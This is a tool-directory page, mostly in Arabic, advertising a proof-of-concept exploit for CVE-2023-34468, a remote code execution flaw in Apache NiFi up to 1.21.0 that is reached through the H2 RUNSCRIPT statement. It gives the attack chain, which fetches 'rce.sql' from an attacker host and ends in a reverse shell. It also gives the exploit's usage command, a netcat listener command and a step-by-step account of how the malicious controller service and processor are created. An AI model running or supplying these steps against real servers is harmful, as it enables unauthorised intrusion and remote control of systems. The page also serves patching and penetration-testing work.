Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34468-POC — PoC استغلال لـ CVE-2023-34468 — تنفيذ تعليمات برمجية عن بُعد عبر H2 RUNSCRIPT في Apache NiFi <= 1.21.0 | Kitploit
أدوات/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

PoC استغلال لـ CVE-2023-34468 — تنفيذ تعليمات برمجية عن بُعد عبر H2 RUNSCRIPT في Apache NiFi <= 1.21.0

عرض المستودع
4منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

تنفيذ تعليمات برمجية عن بُعد عبر H2 Database RUNSCRIPT في Apache NiFi <= 1.21.0


الثغرة

يأتي Apache NiFi مع ملف H2 database JAR مضمّن افتراضيًا. يمكن تهيئة خدمة التحكم DBCPConnectionPool لاستخدام برنامج تشغيل H2 هذا. يدعم H2 عبارة RUNSCRIPT التي تجلب ملف SQL من عنوان URL بعيد وتنفّذه. يمكن لملف SQL هذا تعريف تعليمات Java برمجية عشوائية عبر CREATE ALIAS وتنفيذها على نظام تشغيل الخادم.

سلسلة الهجوم:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

الإصدارات المتأثرة

SoftwareVersion
Apache NiFi<= 1.21.0
Fixed in1.21.1+
JavaAny (bundled)

المتطلبات

  • Python 3.x
  • مكتبة requests → pip install requests
  • هدف NiFi مع وصول كتابة مجهول الهوية أو بيانات اعتماد صالحة
  • وصول شبكي من الهدف إلى جهازك (لاستدعاء reverse shell)

الاستخدام

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

الوسائط

ArgumentDefaultDescription
--targethttp://NiFi.target.comTarget NiFi base URL
--lhost10.10.10.10Your IP (tun0)
--lport4444Reverse shell listener port
--http-port80Port to serve rce.sql
--cleanupFalseDelete created artifacts after run

الإعداد

Terminal 1 — listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

ما الذي يفعله الـ PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
تنزيل الأداة